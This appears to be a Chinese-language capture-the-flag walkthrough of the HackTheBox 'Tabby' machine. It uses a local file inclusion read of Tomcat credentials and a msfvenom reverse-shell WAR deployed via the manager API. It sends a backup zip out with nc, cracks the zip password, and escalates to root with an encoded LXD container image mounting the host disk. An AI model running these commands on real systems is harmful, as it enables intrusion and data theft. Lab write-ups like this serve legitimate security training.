hackthebox-tabby （LFI tomcat9 渗透 lxd 提权）

1、扫描

ssh可能有登录。80是web，8080常规是tomcat。就这几常规端口说明主要是进网页搜集信息

C:\root> nmap -A 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 15:49 CST
Nmap scan report for 10.10.10.194 (10.10.10.194)
Host is up (0.39s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-title: Apache Tomcat
Aggressive OS guesses: Linux 3.1

2、LFI

点开网页看看8080的tom猫。
下面给了user目录

80网页，点击news，跳到这个。打不开，但发现网址地址变了。那么我们把10.10.10.149 megahosting.htb这个加到本机/etc/hosts里

做多了就知道。从file=可猜是经典的LFI漏洞

结合之前tom猫里的user目录，我再= 后面加入 user目录，是否能看到用户信息？

但按网站给的目录，还是不行。
我自己在本机上装个tomcat9

apt-get update
apt-get install tomcat9
updatedb
locate tomcat-users.xml

发现目录真实地址

再按这个目录，页面显示空白，用curl。出现

C:\root> curl http://megahosting.htb/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--Licensed to the Apache Software Foundation (ASF) under one or morecontributor license agreements.  See the NOTICE file distributed withthis work for additional information regarding copyright ownership.The ASF licenses this file to You under the Apache License, Version 2.0(the "License"); you may not use this file except in compliance withthe License.  You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an "AS IS" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"version="1.0">
<!--NOTE:  By default, no user is included in the "manager-gui" role requiredto operate the "/manager/html" web application.  If you wish to use this app,you must define such a user - the username and password are arbitrary. It isstrongly recommended that you do NOT use one of the users in the commented outsection below since they are intended for use with the examples webapplication.
-->
<!--NOTE:  The sample user and role entries below are intended for use with theexamples web application. They are wrapped in a comment and thus are ignoredwhen reading this file. If you wish to configure these users for use with theexamples web application, do not forget to remove the <!.. ..> that surroundsthem. You will also need to set the passwords to something appropriate.
-->
<!--<role rolename="tomcat"/><role rolename="role1"/><user username="tomcat" password="<must-be-changed>" roles="tomcat"/><user username="both" password="<must-be-changed>" roles="tomcat,role1"/><user username="role1" password="<must-be-changed>" roles="role1"/>
--><role rolename="admin-gui"/><role rolename="manager-script"/><user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
C:\root>

3、tomcat9渗透

底部看到账号密码后。做多了就知道因为tomcat是java写的，用war渗透。
先做恶意war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.9 LPORT=9001 -f war > test.war

渗透，传进去。参考官方文档的远程执行http://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html

用curl远程传输执行

curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file test.war "http://megahosting.htb:8080//manager/text/deploy?path=/test.war"

本机打开接收。然后再点击这个网址触发

http://megahosting.htb:8080/test.war/

收到，升级shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

4、提权至ash

老套路linpeas进去扫https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

发现两个用户，做多了就知道先提权至ash再提root

发现backup，后备备用的意思，做多了就知道很有用

传到本机看看。

nc 10.10.14.9 31337 < /var/www/html/files/16162020_backup.zip

本机打开接收

nc -nlvp 31337 > tabby.zip

要密码。frackzip解密

C:\root\htb\tabby> fcrackzip tabby.zip -u -D -p /usr/share/wordlists/rockyou.txtPASSWORD FOUND!!!!: pw == admin@it
C:\root\htb\tabby>

拿到密后，打开文件，里面没啥有价值。

但这个密码是否是ash的呢？？
靶机切换。成功

su ash

5、lxd提权至 root

以ash身份继续linpeas扫
没啥价值发现，但是所在组是lxd

这里有篇lxd提权方法参考文章

但是试了很多次，我下载安装总是报错。按提示的方法也解决不了。我搜了搜别人的文章，他们下载安装很顺利，提权一气呵成，搞不懂。和中国网络有关？？？
所以换另一种方法，更简单搞定root。参考国外高手的文章https://0xdf.gitlab.io/2020/11/07/htb-tabby.html。他也是参考另一个高手的，可惜大陆网络打不开。

ash@tabby:/var/lib/tomcat9$ cd /dev/shm
ash@tabby:/dev/shm$ echo QlpoOTFBWSZTWaxzK54ABPR/p86QAEBoA//QAA3voP/v3+AACAAEgACQAIAIQAK8KAKCGURPUPJGRp6gNAAAAGgeoA5gE0wCZDAAEwTAAADmATTAJkMAATBMAAAEiIIEp5CepmQmSNNqeoafqZTxQ00HtU9EC9/dr7/586W+tl+zW5or5/vSkzToXUxptsDiZIE17U20gexCSAp1Z9b9+MnY7TS1KUmZjspN0MQ23dsPcIFWwEtQMbTa3JGLHE0olggWQgXSgTSQoSEHl4PZ7N0+FtnTigWSAWkA+WPkw40ggZVvYfaxI3IgBhip9pfFZV5Lm4lCBExydrO+DGwFGsZbYRdsmZxwDUTdlla0y27s5Euzp+Ec4hAt+2AQL58OHZEcPFHieKvHnfyU/EEC07m9ka56FyQh/LsrzVNsIkYLvayQzNAnigX0venhCMc9XRpFEVYJ0wRpKrjabiC9ZAiXaHObAY6oBiFdpBlggUJVMLNKLRQpDoGDIwfle01yQqWxwrKE5aMWOglhlUQQUit6VogV2cD01i0xysiYbzerOUWyrpCAvE41pCFYVoRPj/B28wSZUy/TaUHYx9GkfEYg9mcAilQ+nPCBfgZ5fl3GuPmfUOB3sbFm6/bRA0nXChku7aaN+AueYzqhKOKiBPjLlAAvxBAjAmSJWD5AqhLv/fWja66s7omu/ZTHcC24QJ83NrM67KACLACNUcnJjTTHCCDUIUJtOtN+7rQL+kCm4+U9Wj19YXFhxaXVt6Ph1ALRKOV9Xb7Sm68oF7nhyvegWjELKFH3XiWstVNGgTQTWoCjDnpXh9+/JXxIg4i8mvNobXGIXbmrGeOvXE8pou6wdqSD/F3JFOFCQrHMrng= | base64 -d > bob.tar.bz2依次输入。 中途的询问全部按回车。
lxd initlxc image import bob.tar.bz2 --alias bobImagelxc init bobImage bobVM -c security.privileged=truelxc config device add bobVM realRoot disk source=/ path=rlxc start bobVM
lxc exec bobVM -- /bin/sh